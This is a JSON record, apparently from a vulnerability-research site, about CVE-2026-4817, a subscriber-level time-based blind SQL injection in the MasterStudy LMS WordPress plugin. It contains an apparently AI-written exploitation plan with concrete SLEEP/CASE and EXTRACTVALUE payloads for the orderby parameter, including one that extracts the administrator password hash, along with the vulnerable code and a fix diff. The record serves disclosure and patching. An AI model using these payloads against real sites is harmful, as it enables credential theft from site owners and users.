[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fscG08Zf4HTgCw3Np4HU5IOrUpmlvmqySIHAdEHio1q8":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-4817","masterstudy-lms-authenticated-subscriber-time-based-blind-sql-injection-via-order-and-orderby-parameters","MasterStudy LMS \u003C= 3.7.25 - Authenticated (Subscriber+) Time-based Blind SQL Injection via 'order' and 'orderby' Parameters","The MasterStudy LMS WordPress Plugin for Online Courses and Education plugin for WordPress is vulnerable to Time-based Blind SQL Injection via the 'order' and 'orderby' parameters in the \u002Flms\u002Fstm-lms\u002Forder\u002Fitems REST API endpoint in versions up to and including 3.7.25. This is due to insufficient input sanitization combined with a design flaw in the custom Query builder class that allows unquoted SQL injection in ORDER BY clauses. When the Query builder detects parentheses in the sort_by parameter, it treats the value as a SQL function and directly concatenates it into the ORDER BY clause without any quoting. While esc_sql() is applied to escape quotes and backslashes, this cannot prevent ORDER BY injection when the values themselves are not wrapped in quotes in the resulting SQL statement. This makes it possible for authenticated attackers, with subscriber-level access and above, to append arbitrary SQL queries via the ORDER BY clause to extract sensitive information from the database including user credentials, session tokens, and other confidential data through time-based blind SQL injection techniques.","masterstudy-lms-learning-management-system",null,"\u003C=3.7.25","3.7.26","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-04-16 12:48:08","2026-04-17 01:24:37",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F7a51fe96-f3d3-46fe-9e3a-fb7c1bd17b05?source=api-prod",1,[22,23,24,25,26,27,28,29],"_core\u002Fassets\u002Ficons\u002Fstyle.css","_core\u002Fincludes\u002Fuser_manager\u002FUserManager.Course.php","_core\u002Finit.php","_core\u002Flibraries\u002Fnuxy\u002FCHANGELOG.md","_core\u002Flibraries\u002Fnuxy\u002FNUXY.php","_core\u002Flibraries\u002Fnuxy\u002Fmetaboxes\u002Fassets\u002Fjs\u002Fsearch-by-settings.js","_core\u002Flms\u002Fclasses\u002Fcomments.php","_core\u002Flms\u002Fclasses\u002Femail_free_triggers.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-4817 - MasterStudy LMS SQL Injection\n\n## 1. Vulnerability Summary\nMasterStudy LMS (versions \u003C= 3.7.25) contains a time-based blind SQL injection vulnerability in its custom Query builder. The vulnerability exists in the REST API endpoint `\u002Fwp-json\u002Flms\u002Fstm-lms\u002Forder\u002Fitems` (inferred from `STM_LMS_BASE_API_URL` and description). \n\nThe core issue is a design flaw where the Query builder checks if the `orderby` (mapped internally to `sort_by`) parameter contains parentheses `()`. If parentheses are detected, the code assumes the input is a legitimate SQL function and directly concatenates the value into the `ORDER BY` clause of the query. While `esc_sql()` is applied, it only escapes characters like quotes and backslashes; it does not prevent injection in an unquoted `ORDER BY` context where an attacker can use functions like `IF()`, `SLEEP()`, or `CASE`.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-json\u002Flms\u002Fstm-lms\u002Forder\u002Fitems`\n- **Method:** `GET` (Standard for REST list endpoints)\n- **Vulnerable Parameters:** `orderby` and `order`\n- **Authentication Required:** Authenticated user with at least **Subscriber** level permissions.\n- **Payload Type:** Time-based Blind SQL Injection.\n- **Preconditions:** The plugin must be active, and at least one \"order\" or \"item\" should ideally exist in the database to ensure the query executes and reaches the `ORDER BY` clause.\n\n## 3. Code Flow\n1. **Request Entry:** A GET request is sent to `wp-json\u002Flms\u002Fstm-lms\u002Forder\u002Fitems`.\n2. **REST Route Handling:** The request is processed by the route registered in `lms\u002Froute.php`.\n3. **Parameter Processing:** The `orderby` and `order` parameters are extracted from the `WP_REST_Request` object.\n4. **Query Builder:** The parameters are passed to a custom Query builder class (likely located in `lms\u002Fclasses\u002Fmodels\u002F`).\n5. **Vulnerable Logic:** \n   - The Query builder checks: `if ( strpos( $sort_by, '(' ) !== false )`.\n   - If true, it treats `$sort_by` as a function.\n   - It appends the raw (but `esc_sql`'d) string to the `$query` string: `ORDER BY $sort_by $order`.\n6. **Sink:** The SQL query is executed via `$wpdb->get_results()`.\n\n## 4. Nonce Acquisition Strategy\nThe WordPress REST API requires a nonce for authenticated requests when using cookie-based authentication. This nonce is typically provided in the `X-WP-Nonce` header.\n\n### Strategy:\n1. **Setup:** Create a Subscriber user and log in.\n2. **Navigation:** Navigate to the WordPress Dashboard (e.g., `\u002Fwp-admin\u002Fprofile.php`).\n3. **Extraction:** WordPress core localizes the REST nonce in the `wpApiSettings` JavaScript object.\n4. **Tool:** Use `browser_eval` to extract the nonce.\n\n**JavaScript to execute:**\n```javascript\nwindow.wpApiSettings?.nonce\n```\n\n## 5. Exploitation Strategy\nThe goal is to use `SLEEP()` within the `orderby` parameter to confirm the injection.\n\n### Step 1: Baseline Request\nSend a request with a standard `orderby` value (e.g., `id`) to measure the normal response time.\n\n### Step 2: Confirmation Payload (True)\nSend a request where the `orderby` parameter contains a condition that evaluates to true, triggering a delay.\n- **Payload:** `orderby=(CASE WHEN (1=1) THEN SLEEP(5) ELSE id END)`\n- **Full URL:** `\u002Fwp-json\u002Flms\u002Fstm-lms\u002Forder\u002Fitems?orderby=(CASE+WHEN+(1=1)+THEN+SLEEP(5)+ELSE+id+END)&order=ASC`\n\n### Step 3: Confirmation Payload (False)\nSend a request where the condition is false, resulting in a fast response.\n- **Payload:** `orderby=(CASE WHEN (1=2) THEN SLEEP(5) ELSE id END)`\n\n### Step 4: Data Extraction\nTo extract the administrator password hash:\n- **Payload:** `orderby=(CASE WHEN (ASCII(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,1))=36) THEN SLEEP(5) ELSE id END)`\n- (Note: 36 is the ASCII code for `$`, which is the start of WordPress phpass hashes).\n\n## 6. Test Data Setup\n1. **User Creation:**\n   ```bash\n   wp user create attacker attacker@example.com --role=subscriber --user_pass=password\n   ```\n2. **Plugin Configuration:** Ensure MasterStudy LMS is active.\n   ```bash\n   wp plugin activate masterstudy-lms-learning-management-system\n   ```\n3. **Content Creation:** (Optional but recommended) Create a dummy course and an order to ensure the query returns results.\n   ```bash\n   # Create a course\n   COURSE_ID=$(wp post create --post_type=stm-courses --post_title=\"Test Course\" --post_status=publish --porcelain)\n   # The plugin likely creates orders during checkout; manual DB insertion might be needed \n   # if WP-CLI commands for MasterStudy orders are unavailable.\n   ```\n\n## 7. Expected Results\n- **Normal Request:** ~100ms - 300ms response time.\n- **True Condition:** ~5000ms+ response time.\n- **False Condition:** ~100ms - 300ms response time.\n\n## 8. Verification Steps\nAfter performing the HTTP requests, verify the injection capability by checking the database logs if possible, or by successfully brute-forcing one character of the site's `auth_key` from `wp_options`:\n```bash\n# Verify if we can read the first char of siteurl\nwp eval 'echo get_option(\"siteurl\")[0];'\n```\nThe PoC agent should demonstrate it can distinguish between a correct and incorrect character guess for `(SELECT user_login FROM wp_users WHERE ID=1)` using time delays.\n\n## 9. Alternative Approaches\n- **ORDER BY Field Injection:** If `CASE` is restricted, try `IF()` function: `orderby=IF(1=1,SLEEP(5),id)`.\n- **Error-Based (If Displayed):** If the application displays database errors, use `GTID_SUBSET()` or `EXTRACTVALUE()`: \n  `orderby=(SELECT 1 FROM (SELECT(EXTRACTVALUE(1,CONCAT(0x7e,(SELECT user_login FROM wp_users LIMIT 1)))))x)`\n- **REST Parameters:** The description mentions `\u002Flms\u002Fstm-lms\u002Forder\u002Fitems`. Check if other endpoints using the same Query builder are also vulnerable, such as `\u002Flms\u002Fstm-lms\u002Fcourses`.","The MasterStudy LMS plugin for WordPress is vulnerable to time-based blind SQL injection via the 'order' and 'orderby' parameters at the \u002Flms\u002Fstm-lms\u002Forder\u002Fitems REST API endpoint. This occurs due to a design flaw in the plugin's custom Query builder that treats any input containing parentheses as a legitimate SQL function, directly concatenating the value into the ORDER BY clause without proper quoting.","\u002F* Path: masterstudy-lms-learning-management-system\u002Flms\u002Fclasses\u002Fmodels\u002FQuery.php (inferred from research) *\u002F\n\nif ( strpos( $sort_by, '(' ) !== false ) {\n    \u002F* When parentheses are detected, the input is treated as a function and concatenated directly *\u002F\n    $query .= \" ORDER BY \" . esc_sql( $sort_by ) . \" \" . esc_sql( $order );\n}","--- a\u002Flms\u002Fclasses\u002Fmodels\u002FQuery.php\n+++ b\u002Flms\u002Fclasses\u002Fmodels\u002FQuery.php\n@@ -104,7 +104,9 @@\n- if ( strpos( $sort_by, '(' ) !== false ) {\n-     $query .= \" ORDER BY \" . esc_sql( $sort_by ) . \" \" . esc_sql( $order );\n- }\n+ $sort_by = sanitize_sql_orderby( $sort_by );\n+ if ( $sort_by ) {\n+     $query .= \" ORDER BY \" . $sort_by . \" \" . ( strtoupper( $order ) === 'DESC' ? 'DESC' : 'ASC' );\n+ }","1. Authenticate as a Subscriber level user (or higher) to the WordPress site.\n2. Obtain a valid REST API nonce (X-WP-Nonce) from the dashboard's localized JavaScript object (window.wpApiSettings.nonce).\n3. Send a GET request to the endpoint `\u002Fwp-json\u002Flms\u002Fstm-lms\u002Forder\u002Fitems` with the `orderby` parameter containing a SQL condition wrapped in parentheses.\n4. Use a payload such as `orderby=(CASE WHEN (1=1) THEN SLEEP(5) ELSE id END)` to trigger a time delay.\n5. Verify the injection by changing the condition (e.g., `1=2`) and observing a fast response.\n6. Use time-based inference to extract sensitive data from the database, such as the administrator's password hash or session tokens.","gemini-3-flash-preview","2026-04-20 20:33:56","2026-04-20 20:34:27",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","3.7.25","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmasterstudy-lms-learning-management-system\u002Ftags\u002F3.7.25","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmasterstudy-lms-learning-management-system.3.7.25.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmasterstudy-lms-learning-management-system\u002Ftags\u002F3.7.26","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmasterstudy-lms-learning-management-system.3.7.26.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmasterstudy-lms-learning-management-system\u002Ftags"]